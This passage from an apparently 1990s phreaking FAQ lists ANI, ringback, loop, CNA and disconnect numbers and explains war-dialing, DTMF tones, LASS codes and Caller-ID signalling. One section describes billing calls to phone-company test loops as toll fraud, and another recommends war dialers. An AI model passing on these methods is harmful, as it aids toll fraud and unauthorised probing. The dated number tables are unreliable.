  2622.   415  2222             San Francisco, CA
  2623.   415  640              San Francisco, CA
  2624.   415  760-2878         San Francisco, CA
  2625.   415  7600-2222        San Francisco, CA
  2626.   419  311              Toledo, OH
  2627.   502  2002222222       Frankfort/Louisville/Paducah/Shelbyville, KY
  2628.   502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
  2629.   503  611              Portland, OR
  2630.   503  999              Portland, OR (GTE)
  2631.   504  99882233         Baton Rouge/New Orleans, LA
  2632.   504  201-269-1111     Baton Rouge/New Orleans, LA
  2633.   504  998              Baton Rouge/New Orleans, LA
  2634.   504  99851-0000000000 Baton Rouge/New Orleans, LA
  2635.   508  958              Fall River/New Bedford/Worchester, MA
  2636.   508  200-222-1234     Fall River/New Bedford/Worchester, MA
  2637.   508  200-222-2222     Fall River/New Bedford/Worchester, MA
  2638.   508  26011            Fall River/New Bedford/Worchester, MA
  2639.   509  560              Spokane/Walla Walla/Yakima, WA
  2640.   512  830              Austin/Corpus Christi, TX
  2641.   512  970-xxxx         Austin/Corpus Christi, TX
  2642.   515  5463             Des Moines, IA
  2643.   515  811              Des Moines, IA
  2644.   516  958              Hempstead/Long Island, NY
  2645.   516  968              Hempstead/Long Island, NY
  2646.   517  200-222-2222     Bay City/Jackson/Lansing, MI
  2647.   517  200200200200200  Bay City/Jackson/Lansing, MI
  2648.   518  997              Albany/Schenectady/Troy, NY
  2649.   518  998              Albany/Schenectady/Troy, NY
  2650.   603  200-222-2222     NH
  2651.   606  997-555-1212     Ashland/Winchester, KY
  2652.   606  711              Ashland/Winchester, KY
  2653.   607  993              Binghamton/Elmira, NY
  2654.   609  958              Atlantic City/Camden/Trenton/Vineland, NJ
  2655.   610  958              Allentown/Reading, PA
  2656.   612  511              Minneapolis/St.Paul, MN
  2657. N 614  200              Columbus/Steubenville, OH
  2658. N 614  571              Columbus/Steubenville, OH
  2659.   615  200200200200200  Chatanooga/Knoxville/Nashville, TN
  2660.   615  2002222222       Chatanooga/Knoxville/Nashville, TN
  2661.   615  830              Nashville, TN
  2662.   616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
  2663.   617  200-222-1234     Boston, MA
  2664.   617  200-222-2222     Boston, MA
  2665.   617  200-444-4444     Boston, MA (Woburn, MA)
  2666.   617  220-2622         Boston, MA
  2667.   617  958              Boston, MA
  2668.   618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
  2669.   618  930              Alton/Cairo/Mt.Vernon, IL
  2670.   619  211-2001         San Diego, CA
  2671.   703  811              Alexandria/Arlington/Roanoke, VA
  2672. N 704  311              Asheville/Charlotte, NC
  2673.   708  1-200-555-1212   Chicago/Elgin, IL
  2674.   708  1-200-8825       Chicago/Elgin, IL (Last four change rapidly)
  2675. N 708  200-6153         Chicago/Elgin, IL
  2676. N 708  724-9951         Chicago/Elgin, IL
  2677. N 708  356-9646         Chicago/Elgin, IL
  2678. N 713  380              Houston, TX
  2679.   713  970-xxxx         Houston, TX
  2680. N 713  811              Humble, TX
  2681.   714  114              Anaheim, CA (GTE)
  2682.   714  211-2121         Anaheim, CA (PacBell)
  2683.   714  211-2222         Anaheim, CA (Pacbell)
  2684.   716  511              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
  2685. N 716  990              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
  2686.   717  958              Harrisburg/Scranton/Wilkes-Barre, PA
  2687.   718  958              Bronx/Brooklyn/Queens/Staten Island, NY
  2688.   802  2-222-222-2222   Vermont
  2689.   802  200-222-2222     Vermont
  2690.   802  1-700-222-2222   Vermont
  2691.   802  111-2222         Vermont
  2692. N 805  114              Bakersfield/Santa Barbara, CA
  2693.   805  211-2345         Bakersfield/Santa Barbara, CA
  2694.   805  211-2346         Bakersfield/Santa Barbara, CA (Returns DTMF)
  2695.   805  830              Bakersfield/Santa Barbara, CA
  2696.   806  970-xxxx         Amarillo/Lubbock, TX
  2697.   810  200200200200200  Flint/Pontiac/Southfield/Troy, MI
  2698.   812  410-555-1212     Evansville, IN
  2699.   813  311              Ft. Meyers/St. Petersburg/Tampa, FL
  2700.   815  200-xxx-xxxx     La Salle/Rockford, IL
  2701.   815  290              La Salle/Rockford, IL
  2702.   817  211              Ft. Worth/Waco, TX
  2703.   817  970-611-1111     Ft. Worth/Waco, TX  (Southwestern Bell)
  2704.   818  1223             Pasadena, CA (Some 1AESS switches)
  2705.   818  211-2345         Pasadena, CA (English response)
  2706.   818  211-2346         Pasadena, CA (DTMF response)
  2707. N 903  970-611-1111     Denison, TX
  2708.   906  1-200-222-2222   Marquette/Sault Ste. Marie, MI
  2709.   908  958              New Brunswick, NJ
  2710.   910  200              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  2711.   910  311              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  2712.   910  988              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  2713.   914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  2714.   915  970-xxxx         Abilene/El Paso, TX
  2715. N 916  211-2222         Sacramento, CA (Pac Bell)
  2716. N 916  461              Sacramento, CA (Roseville Telepohone)
  2717.   919  200              Durham, NC
  2718.   919  711              Durham, NC
  2719.  
  2720.   Canada:
  2721.   204  644-xxxx         Manitoba
  2722.   306  115              Saskatchewan, Canada
  2723.   403  311              Alberta, Yukon and N.W. Territory
  2724.   403  908-222-2222     Alberta, Yukon and N.W. Territory
  2725.   403  999              Alberta, Yukon and N.W. Territory
  2726.   416  997-xxxx         Toronto, Ontario
  2727. N 506  1-555-1313       New Brunswick
  2728.   514  320-xxxx         Montreal, Quebec
  2729.   519  320-xxxx         London, Ontario
  2730.   604  1116             British Columbia, Canada
  2731.   604  1211             British Columbia, Canada
  2732.   604  211              British Columbia, Canada
  2733.   613  320-2232         Ottawa, Ontario
  2734.   705  320-4567         North Bay/Saulte Ste. Marie, Ontario
  2735.  
  2736.   Australia:
  2737.   +61  03-552-4111      Victoria 03 area
  2738.   +612 19123            All major capital cities
  2739.  
  2740.   United Kingdom:
  2741.   175
  2742.  
  2743.  
  2744. 12. What is a ringback number?
  2745.  
  2746. A ringback number is a number that you call that will immediately
  2747. ring the telephone from which it was called.
  2748.  
  2749. In most instances you must call the ringback number, quickly hang up
  2750. the phone for just a short moment and then let up on the switch, you
  2751. will then go back off hook and hear a different tone.  You may then
  2752. hang up.  You will be called back seconds later.
  2753.  
  2754.  
  2755. 13. What is the ringback number for my area?
  2756.  
  2757. An 'x' means insert those numbers from the phone number from which you
  2758. are calling.  A '?' means that the number varies from switch to switch
  2759. in the area, or changes from time to time.  Try all possible
  2760. combinations.
  2761.  
  2762. If the ringback for your NPA is not listed, try common ones such as
  2763. 954, 957 and 958.  Also, try using the numbers listed for other NPA's
  2764. served by your telephone company.
  2765.  
  2766.   NPA  Ringback number  Geographic area
  2767.   ---  ---------------  ---------------------------------------------
  2768.   201  55?-xxxx         Hackensack/Jersey City/Newark/Paterson, NJ
  2769.   202  958-xxxx         District of Columbia
  2770. U 203  99?-xxxx         CT
  2771. N 208  99xxx-xxxx       ID
  2772.   213  1-95x-xxxx       Los Angeles, CA
  2773. N 216  551-XXXX         Akron/Canton/Cleveland/Lorain/Youngstown, OH
  2774.   219  571-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  2775.   219  777-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  2776.   301  579-xxxx         Hagerstown/Rockville, MD
  2777.   301  958-xxxx         Hagerstown/Rockville, MD
  2778.   303  99X-xxxx         Grand Junction, CO
  2779.   304  998-xxxx         WV
  2780.   305  999-xxxx         Ft. Lauderdale/Key West/Miami, FL
  2781.   312  511-xxxx         Chicago, IL
  2782.   312  511-xxx-xxxx     Chicago, IL
  2783.   312  57?-xxxx         Chicago, IL
  2784.   315  98x-xxxx         Syracuse/Utica, NY
  2785.   317  777-xxxx         Indianapolis/Kokomo, IN
  2786.   317  yyy-xxxx         Indianapolis/Kokomo, IN (y=3rd digit of phone number)
  2787.   319  79x-xxxx         Davenport/Dubuque, Iowa
  2788.   401  98?-xxxx         RI
  2789.   404  450-xxxx         Atlanta, GA
  2790.   407  988-xxxx         Orlando/West Palm Beach, FL
  2791.   412  985-xxxx         Pittsburgh, PA
  2792.   414  977-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  2793.   414  978-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  2794.   415  350-xxxx         San Francisco, CA
  2795.   417  551-xxxx         Joplin/Springfield, MO
  2796. N 501  221-xxx-xxxx     AR
  2797.   501  721-xxx-xxxx     AR
  2798.   502  988              Frankfort/Louisville/Paducah/Shelbyville, KY
  2799. N 503  541-XXXX         OR
  2800.   504  99x-xxxx         Baton Rouge/New Orleans, LA
  2801.   504  9988776655       Baton Rouge/New Orleans, LA
  2802.   505  59?-xxxx         New Mexico
  2803.   512  95X-xxxx         Austin, TX
  2804.   513  99?-xxxx         Cincinnati/Dayton, OH
  2805. N 513  955-xxxx         Cincinnati/Dayton, OH
  2806.   516  660-xxx-xxxx     Hempstead/Long Island, NY
  2807.   601  777-xxxx         MS
  2808.   609  55?-xxxx         Atlantic City/Camden/Trenton/Vineland, NJ
  2809.   612  511              Minneapolis/St.Paul, MN
  2810.   612  999-xxx-xxxx     Minneapolis/St.Paul, MN
  2811. N 614  998-xxxx         Columbus/Steubenville, OH
  2812.   615  930-xxxx         Chatanooga/Knoxville/Nashville, TN
  2813.   616  946-xxxx         Battle Creek/Grand Rapids/Kalamazoo, MI
  2814.   619  331-xxxx         San Diego, CA
  2815.   619  332-xxxx         San Diego, CA
  2816.   703  958-xxxx         Alexandria/Arlington/Roanoke, VA
  2817. N 708  511-xxxx         Chicago/Elgin, IL
  2818.   714  330?             Anaheim, CA (GTE)
  2819.   714  33?-xxxx         Anaheim, CA (PacBell)
  2820.   716  981-xxxx         Rochester, NY (Rochester Tel)
  2821. N 718  660-xxxx         Bronx/Brooklyn/Queens/Staten Island, NY
  2822.   719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO
  2823.   801  938-xxxx         Utah
  2824.   801  939-xxxx         Utah
  2825. N 802  987-xxxx         Vermont
  2826.   804  260              Charlottesville/Newport News/Norfolk/Richmond, VA
  2827.   805  114              Bakersfield/Santa Barbara, CA
  2828.   805  980-xxxx         Bakersfield/Santa Barbara, CA
  2829.   810  951-xxx-xxxx     Pontiac/Southfield/Troy, MI
  2830.   813  711              Ft. Meyers/St. Petersburg/Tampa, FL
  2831. U 817  971              Ft. Worth/Waco, TX (Flashhook, then 2#)
  2832.   906  951-xxx-xxxx     Marquette/Sault Ste. Marie, MI
  2833.   908  55?-xxxx         New Brunswick, NJ
  2834.   908  953              New Brunswick, NJ
  2835. N 913  951-xxxx         Lawrence/Salina/Topeka, KS
  2836.   914  660-xxxx         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  2837.  
  2838.   Canada:
  2839.   416  57x-xxxx         Toronto, Ontario
  2840.   416  99x-xxxx         Toronto, Ontario
  2841.   416  999-xxx-xxxx     Toronto, Ontario
  2842. N 506  572+xxx-xxxx     New Brunswick
  2843.   514  320-xxx-xxxx     Montreal, Quebec
  2844.   613  999-xxx-xxxx     Ottawa, Ontario
  2845.   705  999-xxx-xxxx     North Bay/Saulte Ste. Marie, Ontario
  2846.  
  2847.   Australia: +61 199
  2848. U Brazil: 109 or 199
  2849.   New Zealand: 137
  2850.   Sweden: 0058
  2851.   United Kingdom: 174 or 1744 or 175 or 0500-89-0011
  2852.  
  2853.  
  2854. 14. What is a loop?
  2855.  
  2856. This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
  2857.                    by Minor Threat & Mucho Maas
  2858.  
  2859. Loops are a pair of phone numbers, usually consecutive, like 836-9998
  2860. and 836-9999.  They are used by the phone company for testing.  What
  2861. good do loops do us?  Well, they are cool in a few ways.  Here is a
  2862. simple use of loops.  Each loop has two ends, a 'high' end, and a
  2863. 'low' end.  One end gives a (usually) constant, loud tone when it is
  2864. called. The other end is silent.  Loops don't usually ring either.
  2865. When BOTH ends are called, the people that called each end can talk
  2866. through the loop.  Some loops are voice filtered and won't pass
  2867. anything but a constant tone; these aren't much use to you.  Here's
  2868. what you can use working loops for:  billing phone calls!  First, call
  2869. the end that gives the loud tone.  Then if the operator or someone
  2870. calls the other end, the tone will go quiet.  Act like the phone just
  2871. rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
  2872. what the fuck ever.  The operator thinks that she just called you, and
  2873. that's it!  Now the phone bill will go to the loop, and your local
  2874. RBOC will get the bill!  Use this technique in moderation, or the loop
  2875. may go down.  Loops are probably most useful when you want to talk to
  2876. someone to whom you don't want to give your phone number.
  2877.  
  2878.  
  2879. 15. What is a loop in my area?
  2880.  
  2881. Many of these loops are no longer functional.  If you are local
  2882. to any of these loops, please try them out an e-mail me the results
  2883. of your research.
  2884.  
  2885.   NPA    High      Low
  2886.   ---  --------  --------
  2887.   201  879-9929  879-9930
  2888.   201  347-9929  347-9930
  2889.   206  827-0018  827-0019
  2890.   206  988-0020  988-0022
  2891.   208  862-9996  862-9997
  2892.   209  732-0044  732-0045
  2893.   201  666-9929  666-9930
  2894. N 210  993-9929  993-9930
  2895. N 210  330-9929  330-9930
  2896. N 210  333-9929  333-9930
  2897. N 210  376-9929  376-9930
  2898. N 210  467-9929  467-9930
  2899.   212  220-9977  220-9979
  2900.   212  283-9977  283-9979
  2901.   212  283-9977  283-9997
  2902.   212  352-9900  352-9906
  2903.   212  365-9977  365-9979
  2904.   212  529-9900  529-9906
  2905.   212  562-9977  562-9979
  2906.   212  986-9977  986-9979
  2907.   213  360-1118  360-1119
  2908.   213  365-1118  365-1119
  2909.   213  455-0002  455-XXXX
  2910.   213  455-0002  455-xxxx
  2911.   213  546-0002  546-XXXX
  2912.   213  546-0002  546-xxxx
  2913.   213  549-1118  549-1119
  2914.   214  291-4759  291-4757
  2915.   214  299-4759  299-4757
  2916.   305  778-9952  778-9951
  2917.   305  964-9951  964-9952
  2918.   307  468-9999  468-9998
  2919.   308  357-0004  357-0005
  2920. N 310  365-1118  365-1119
  2921. N 310  445-0002  445-????
  2922. N 310  455-0002  455-????
  2923. N 310  545-0002  545-????
  2924. N 310  546-0002  546-????
  2925. N 312  262-9902  262-9903
  2926.   313  224-9996  224-9997
  2927.   313  225-9996  225-9997
  2928.   313  234-9996  234-9997
  2929.   313  237-9996  237-9997
  2930.   313  256-9996  256-9997
  2931.   313  272-9996  272-9997
  2932.   313  273-9996  273-9997
  2933.   313  277-9996  277-9997
  2934.   313  281-9996  281-9997
  2935.   313  292-9996  292-9997
  2936.   313  299-9996  299-9997
  2937.   313  321-9996  321-9997
  2938.   313  326-9996  326-9997
  2939.   313  356-9996  356-9997
  2940.   313  362-9996  362-9997
  2941.   313  369-9996  369-9997
  2942.   313  388-9996  388-9997
  2943.   313  397-9996  397-9997
  2944.   313  399-9996  399-9997
  2945.   313  445-9996  445-9997
  2946.   313  465-9996  465-9997
  2947.   313  471-9996  471-9997
  2948.   313  474-9996  474-9997
  2949.   313  477-9996  477-9997
  2950.   313  478-9996  478-9997
  2951.   313  483-9996  483-9997
  2952.   313  497-9996  497-9997
  2953.   313  526-9996  526-9997
  2954.   313  552-9996  552-9997
  2955.   313  556-9996  556-9997
  2956.   313  561-9996  561-9997
  2957.   313  569-9996  569-9996
  2958.   313  575-9996  575-9997
  2959.   313  577-9996  577-9997
  2960.   313  585-9996  585-9997
  2961.   313  591-9996  591-9997
  2962.   313  621-9996  621-9997
  2963.   313  626-9996  626-9997
  2964.   313  644-9996  644-9997
  2965.   313  646-9996  646-9997
  2966.   313  647-9996  647-9997
  2967.   313  649-9996  649-9997
  2968.   313  663-9996  663-9997
  2969.   313  665-9996  665-9997
  2970.   313  683-9996  683-9997
  2971.   313  721-9996  721-9997
  2972.   313  722-9996  722-9997
  2973.   313  728-9996  728-9997
  2974.   313  731-9996  731-9997
  2975.   313  751-9996  751-9997
  2976.   313  776-9996  776-9997
  2977.   313  781-9996  781-9997
  2978.   313  787-9996  787-9997
  2979.   313  822-9996  822-9997
  2980.   313  833-9996  833-9997
  2981.   313  851-9996  851-9997
  2982.   313  871-9996  871-9997
  2983.   313  875-9996  875-9997
  2984.   313  886-9996  886-9997
  2985.   313  888-9996  888-9997
  2986.   313  898-9996  898-9997
  2987.   313  934-9996  934-9997
  2988.   313  942-9996  942-9997
  2989.   313  963-9996  963-9997
  2990.   313  977-9996  977-9997
  2991.   315  673-9995  673-9996
  2992.   315  695-9995  695-9996
  2993.   402  422-0001  422-0002
  2994.   402  422-0003  422-0004
  2995.   402  422-0005  422-0006
  2996.   402  422-0007  422-0008
  2997.   402  572-0003  572-0004
  2998.   402  779-0004  779-0007
  2999.   406  225-9902  225-9903
  3000.   517  422-9996  422-9997
  3001.   517  423-9996  423-9997
  3002.   517  455-9996  455-9997
  3003.   517  563-9996  563-9997
  3004.   517  663-9996  663-9997
  3005.   517  851-9996  851-9997
  3006.   609  921-9929  921-9930
  3007.   609  994-9929  994-9930
  3008.   616  997-9996  997-9997
  3009. N 708  724-9951  724-????
  3010.   713  224-1499  759-1799
  3011.   713  324-1499  324-1799
  3012.   713  342-1499  342-1799
  3013.   713  351-1499  351-1799
  3014.   713  354-1499  354-1799
  3015.   713  356-1499  356-1799
  3016.   713  442-1499  442-1799
  3017.   713  447-1499  447-1799
  3018.   713  455-1499  455-1799
  3019.   713  458-1499  458-1799
  3020.   713  462-1499  462-1799
  3021.   713  466-1499  466-1799
  3022.   713  468-1499  468-1799
  3023.   713  469-1499  469-1799
  3024.   713  471-1499  471-1799
  3025.   713  481-1499  481-1799
  3026.   713  482-1499  482-1799
  3027.   713  484-1499  484-1799
  3028.   713  487-1499  487-1799
  3029.   713  489-1499  489-1799
  3030.   713  492-1499  492-1799
  3031.   713  493-1499  493-1799
  3032.   713  524-1499  524-1799
  3033.   713  526-1499  526-1799
  3034.   713  555-1499  555-1799
  3035.   713  661-1499  661-1799
  3036.   713  664-1499  664-1799
  3037.   713  665-1499  665-1799
  3038.   713  666-1499  666-1799
  3039.   713  667-1499  667-1799
  3040.   713  682-1499  976-1799
  3041.   713  771-1499  771-1799
  3042.   713  780-1499  780-1799
  3043.   713  781-1499  997-1799
  3044.   713  960-1499  960-1799
  3045.   713  977-1499  977-1799
  3046.   713  988-1499  988-1799
  3047.   805  528-0044  528-0045
  3048.   805  544-0044  544-0045
  3049.   805  773-0044  773-0045
  3050.   808  235-9907  235-9908
  3051.   808  239-9907  239-9908
  3052.   808  245-9907  245-9908
  3053.   808  247-9907  247-9908
  3054.   808  261-9907  261-9908
  3055.   808  322-9907  322-9908
  3056.   808  328-9907  328-9908
  3057.   808  329-9907  329-9908
  3058.   808  332-9907  332-9908
  3059.   808  335-9907  335-9908
  3060.   808  572-9907  572-9908
  3061.   808  623-9907  623-9908
  3062.   808  624-9907  624-9908
  3063.   808  668-9907  668-9908
  3064.   808  742-9907  742-9908
  3065.   808  879-9907  879-9908
  3066.   808  882-9907  882-9908
  3067.   808  885-9907  885-9908
  3068.   808  959-9907  959-9908
  3069.   808  961-9907  961-9908
  3070.   810  362-9996  362-9997
  3071.   813  385-9971  385-xxxx
  3072. N 908  254-9929  254-9930
  3073. N 908  558-9929  558-9930
  3074. N 908  560-9929  560-9930
  3075.   908  776-9930  776-9930
  3076.  
  3077.  
  3078. 16. What is a CNA number?
  3079.  
  3080. CNA stands for Customer Name and Address.  The CNA number is a phone
  3081. number for telephone company personnel to call and get the name and
  3082. address for a phone number.  If a telephone lineman finds a phone line
  3083. he does not recognize, he can use the ANI number to find its phone
  3084. number and then call the CNA operator to see who owns it and where
  3085. they live.
  3086.  
  3087. Normal CNA numbers are available only to telephone company personnel.
  3088. Private citizens may legally get CNA information from private
  3089. companies.  Two such companies are:
  3090.  
  3091. Unidirectory    (900)933-3330
  3092. Telename        (900)884-1212
  3093.  
  3094. Note that these are 900 numbers, and will cost you approximately one
  3095. dollar per minute.
  3096.  
  3097. If you are in 312 or 708, AmeriTech has a pay-for-play CNA service
  3098. available to the general public.  The number is 796-9600.  The cost is
  3099. $.35/call and can look up two numbers per call.
  3100.  
  3101. If you are in 415, Pacific Bell offers a public access CNA service at
  3102. (415)781-5271.
  3103.  
  3104. 17. What is the telephone company CNA number for my area?
  3105.  
  3106.   203  (203)771-8080         CT
  3107.   513  (513)397-9110         Cincinnati/Dayton, OH
  3108.   516  (516)321-5700         Hempstead/Long Island, NY
  3109. N 518  (518)471-8111         Albany/Schenectady/Troy, NY
  3110.   614  (614)464-0123         Columbus/Steubenville, OH
  3111.   813  (813)270-8711         Ft. Meyers/St. Petersburg/Tampa, FL
  3112.  
  3113.  
  3114. 18. What are some numbers that always ring busy?
  3115.  
  3116.   216  xxx-9887              Akron/Canton/Cleveland/Lorain/Youngstown, OH
  3117. N 303  431-0000              Denver, CO
  3118. N 303  866-8660              Denver, CO
  3119.   316  952-7265              Dodge City/Wichita, KS
  3120.   501  377-99xx              AR
  3121.   719  472-3773              Colorado Springs/Leadville/Pueblo, CO
  3122.   805  255-0699              Bakersfield/Santa Barbara, CA
  3123.   818  885-0699              Pasadena, CA
  3124.   906  632-9999              Marquette/Sault Ste. Marie, MI
  3125.   906  635-9999              Marquette/Sault Ste. Marie, MI
  3126.   914  576-9903              Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  3127.  
  3128.  
  3129. 19. What are some numbers that temporarily disconnect phone service?
  3130.  
  3131.   314  511        Columbia/Jefferson City/St.Louis, MO (1 minute)
  3132.   404  420        Atlanta, GA                          (5 minutes)
  3133.   405  953        Enid/Oklahoma City, OK               (1 minute)
  3134.   407  511        Orlando/West Palm Beach, FL          (1 minute)
  3135.   512  200        Austin/Corpus Christi, TX            (1 minute)
  3136.   516  480        Hempstead/Long Island, NY            (1 minute)
  3137.   603  980        NH
  3138. N 614  xxx-9894   Columbus/Steubenville, OH
  3139. N 805  119        Bakersfield/Santa Barbara, CA        (3 minutes)
  3140.   919  211 or 511 Durham, NC                           (10 min - 1 hour)
  3141.  
  3142.  
  3143. 20. What is scanning?
  3144.  
  3145. Scanning is dialing a large number of telephone numbers in the hope
  3146. of finding interesting carriers (computers) or tones.
  3147.  
  3148. Scanning can be done by hand, although dialing several thousand
  3149. telephone numbers by hand is extremely boring and takes a long time.
  3150.  
  3151. Much better is to use a scanning program, sometimes called a war
  3152. dialer or a demon dialer.  Currently, the best war dialer available to
  3153. PC-DOS users is ToneLoc from Minor Threat and Mucho Maas.  ToneLoc can
  3154. be ftp'd from ftp.paranoia.com /pub/toneloc/.
  3155.  
  3156. A war dialer will dial a range of numbers and log what it finds at
  3157. each number.  You can then only dial up the numbers that the war
  3158. dialer marked as carriers or tones.
  3159.  
  3160.  
  3161. 21. Is scanning illegal?
  3162.  
  3163. Excerpt from: 2600, Spring 1990, Page 27:
  3164.  
  3165. -BQ-
  3166. In some places, scanning has been made illegal.  It would be hard,
  3167. though, for someone to file a complaint against you for scanning since
  3168. the whole purpose is to call every number once and only once.  It's
  3169. not likely to be thought of as harassment by anyone who gets a single
  3170. phone call from a scanning computer.  Some central offices have been
  3171. known to react strangely when people start scanning.  Sometimes you're
  3172. unable to get a dialtone for hours after you start scanning.  But
  3173. there is no uniform policy.  The best thing to do is to first find out
  3174. if you've got some crazy law saying you can't do it.  If, as is
  3175. likely, there is no such law, the only way to find out what happens is
  3176. to give it a try.
  3177. -EQ-
  3178.  
  3179. It should be noted that a law making scanning illegal was recently
  3180. passed in Colorado Springs, CO.  It is now illegal to place a call
  3181. in Colorado Springs without the intent to communicate.
  3182.  
  3183.  
  3184. 22. Where can I purchase a lineman's handset?
  3185.  
  3186. Contact East
  3187. 335 Willow Street
  3188. North Andover, MA 01845-5995
  3189. (508)682-2000
  3190.  
  3191. Jensen Tools
  3192. 7815 S. 46th Street
  3193. Phoenix, AZ 85044-5399
  3194.  
  3195. Time Motion Tools
  3196. 12778 Brookprinter Place
  3197. Poway, CA 92064
  3198. (619)679-0303
  3199.  
  3200.  
  3201. 23. What are the DTMF frequencies?
  3202.  
  3203. DTMF stands for Dual Tone Multi Frequency.  These are the tones you
  3204. get when you press a key on your telephone touchpad.  The tone of the
  3205. button is the sum of the column and row tones.  The ABCD keys do not
  3206. exist on standard telephones.
  3207.  
  3208.      1209 1336 1477 1633
  3209.  
  3210.      697   1    2    3    A
  3211.  
  3212.      770   4    5    6    B
  3213.  
  3214.      852   7    8    9    C
  3215.  
  3216.      941   *    0    #    D
  3217.  
  3218.  
  3219. 24. What are the frequencies of the telephone tones?
  3220.  
  3221. Type                Hz          On      Off
  3222. ---------------------------------------------------------------------
  3223. Dial Tone         350 & 400     ---     ---
  3224. Busy Signal       480 & 620     0.5     0.5
  3225. Toll Congestion   480 & 620     0.2     0.3
  3226. Ringback (Normal) 440 & 480     2.0     4.0
  3227. Ringback (PBX)    440 & 480     1.5     4.5
  3228. Reorder (Local)   480 & 620     3.0     2.0
  3229. Invalid Number    200 & 400
  3230. Hang Up Warning 1400 & 2060     0.1     0.1
  3231. Hang Up         2450 & 2600     ---     ---
  3232.  
  3233.  
  3234. 25. What are all of the * (LASS) codes?
  3235.  
  3236. Local Area Signalling Services (LASS) and Custom Calling Feature
  3237. Control Codes:
  3238.  
  3239. (These appear to be standard, but may be changed locally)
  3240.  
  3241. Service                     Tone    Pulse/rotary   Notes
  3242. --------------------------------------------------------------------------
  3243. Assistance/Police           *12         n/a        [1]
  3244. Cancel forwarding           *30         n/a        [C1]
  3245. Automatic Forwarding        *31         n/a        [C1]
  3246. Notify                      *32         n/a        [C1] [2]
  3247. Intercom Ring 1 (..)        *51         1151       [3]
  3248. Intercom Ring 2 (.._)       *52         1152       [3]
  3249. Intercom Ring 3 (._.)       *53         1153       [3]
  3250. Extension Hold              *54         1154       [3]
  3251. Customer Originated Trace   *57         1157
  3252. Selective Call Rejection    *60         1160       (or Call Screen)
  3253. Selective Distinct Alert    *61         1161
  3254. Selective Call Acceptance   *62         1162
  3255. Selective Call Forwarding   *63         1163
  3256. ICLID Activation            *65         1165
  3257. Call Return (outgoing)      *66         1166
  3258. Number Display Blocking     *67         1167       [4]
  3259. Computer Access Restriction *68         1168
  3260. Call Return (incoming)      *69         1169
  3261. Call Waiting disable        *70         1170       [4]
  3262. No Answer Call Transfer     *71         1171
  3263. Usage Sensitive 3 way call  *71         1171
  3264. Call Forwarding: start      *72 or 72#  1172
  3265. Call Forwarding: cancel     *73 or 73#  1173
  3266. Speed Calling (8 numbers)   *74 or 74#  1174
  3267. Speed Calling (30 numbers)  *75 or 75#  1175
  3268. Anonymous Call Rejection    *77         1177       [5] [M: *58]
  3269. Call Screen Disable         *80         1160       (or Call Screen) [M: *50]
  3270. Selective Distinct Disable  *81         1161       [M: *51]
  3271. Select. Acceptance Disable  *82         1162
  3272. Select. Forwarding Disable  *83         1163       [M: *53]
  3273. ICLID Disable               *85         1165
  3274. Call Return (cancel out)    *86         1186       [6] [M: *56]
  3275. Anon. Call Reject (cancel)  *87         1187       [5] [M: *68]
  3276. Call Return (cancel in)     *89         1189       [6] [M: *59]
  3277.  
  3278. Notes:
  3279.  
  3280. [C1]     - Means code used for Cellular One service
  3281. [1]      - for cellular in Pittsburgh, PA A/C 412 in some areas
  3282. [2]      - indicates that you are not local and maybe how to reach you
  3283. [3]      - found in Pac Bell territory; Intercom ring causes a distinctive
  3284.            ring to be generated on the current line; Hold keeps a call
  3285.            connected until another extension is picked up
  3286. [4]      - applied once before each call
  3287. [5]      - A.C.R. blocks calls from those who blocked Caller ID
  3288.            (used in C&P territory, for instance)
  3289. [6]      - cancels further return attempts
  3290. [M: *xx] - alternate code used for MLVP (multi-line variety package)
  3291.            by Bellcore. It goes by different names in different RBOCs.
  3292.            In Bellsouth it is called Prestige. It is an arrangement of
  3293.            ESSEX like features for single or small multiple line groups.
  3294.  
  3295.            The reason for different codes for some features in MLVP is that
  3296.            call-pickup is *8 in MLVP so all *8x codes are reaasigned *5x
  3297.  
  3298.  
  3299. 26. What frequencies do cordless phones operate on?
  3300.  
  3301. Here are the frequencies for the first generation 46/49mhz phones.
  3302. The new 900mhz cordless phones are not covered.
  3303.  
  3304. Channel    Handset Transmit    Base Transmit
  3305. -------    ----------------    -------------
  3306.    1          49.670mhz          46.610mhz
  3307.    2          49.845             46.630
  3308.    3          49.860             46.670
  3309.    4          49.770             46.710
  3310.    5          49.875             46.730
  3311.    6          49.830             46.770
  3312.    7          49.890             46.830
  3313.    8          49.930             46.870
  3314.    9          49.990             46.930
  3315.   10          49.970             46.970
  3316.  
  3317.  
  3318. 27. What is Caller-ID?
  3319.  
  3320. This FAQ answer is stolen from Rockewell:
  3321.  
  3322. Calling Number Delivery (CND), better known as Caller ID, is a
  3323. telephone service intended for residential and small business
  3324. customers.  It allows the called Customer Premises Equipment (CPE) to
  3325. receive a calling party's directory number and the date and time of
  3326. the call during the first 4 second silent interval in the ringing
  3327. cycle.
  3328.  
  3329. Parameters
  3330. ~~~~~~~~~~
  3331. The data signalling interface has the following characteristics:
  3332.  
  3333.         Link Type:                              2-wire, simplex
  3334.     Transmission Scheme:        Analog, phase-coherent FSK
  3335.     Logical 1 (mark)            1200 +/- 12 Hz
  3336.     Logical 0 (space)            2200 +/- 22 Hz
  3337.     Transmission Rate:            1200 bps
  3338.     Transmission Level:            13.5 +/- dBm into 900 ohm load
  3339.  
  3340.  
  3341. Protocol
  3342. ~~~~~~~~
  3343. The protocol uses 8-bit data words (bytes), each bounded by a start
  3344. bit and a stop bit.  The CND message uses the Single Data Message
  3345. format shown below.
  3346.  
  3347. | Channel  |  Carrier  |  Message  |  Message  |  Data       | Checksum |
